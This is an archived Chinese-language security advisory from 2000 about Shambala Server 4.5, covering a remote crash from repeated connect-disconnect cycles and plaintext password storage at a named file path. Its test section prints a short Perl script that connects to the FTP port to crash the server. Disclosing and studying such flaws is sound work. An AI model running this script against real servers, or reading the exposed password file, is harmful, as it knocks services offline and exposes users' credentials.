发布日期：2000-10-10
更新日期：2000-10-10

受影响系统：

Shambala Server 4.5
   - Microsoft Windows 9x
   - Microsoft WIndows NT
   - Microsoft Windows 2000

描述：

---

Shambala是由Evolvable Corpotation（http://www.evolvable.com/）发行的一种
廉价的多功能FTP和Web服务器。它未能正确处理所有的连接。因此可以通过自定义的脚
本从远程使ftp服务器崩溃，这些脚本自动执行打开和关闭与服务器之间的连接的操作。
当断开连接时服务器将崩溃并给出如下错误信息：
  Run-time error `20127`
  invalid ConnectionID

第二个问题是Shambala在服务器上用明文保存所有密码：
c:\program files\shambala\passwords.txt （就我们的例子而言）

这在NT服务器上并不是个大问题，因为存取权限的设置使得普通用户无法读取该文件。
但是因为这个服务器软件也存在Windows 95和Windows 98的版本，所以任何用户都可
能存取该文件。

<* 来源： zillion (zillion@safemode.org) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
#
# This tool (tool not exploit!) crashes shambale server 4.5
# This is a stripped version of Guido Bakkers exploit code (bedankt)
#
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
&usage if !defined($args{s});
$serv = $args{s};
$EOL="\015\012";
$remote = IO::Socket::INET->new(
                    Proto       => "tcp",
                    PeerAddr    => $args{s},
                    PeerPort    => "ftp(21)",
                ) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);
print "Done...\n";
exit; # remove this and the server will *NOT* crash !*!
sub usage {die("\n$0 -s ipaddress\n\n");}



建议：

---

临时解决办法：

    NSFOCUS建议您暂时禁止该服务器程序，直到获得修正后的新版本。

厂商补丁：

    暂无。

浏览次数：5631
严重程度：0（网友投票）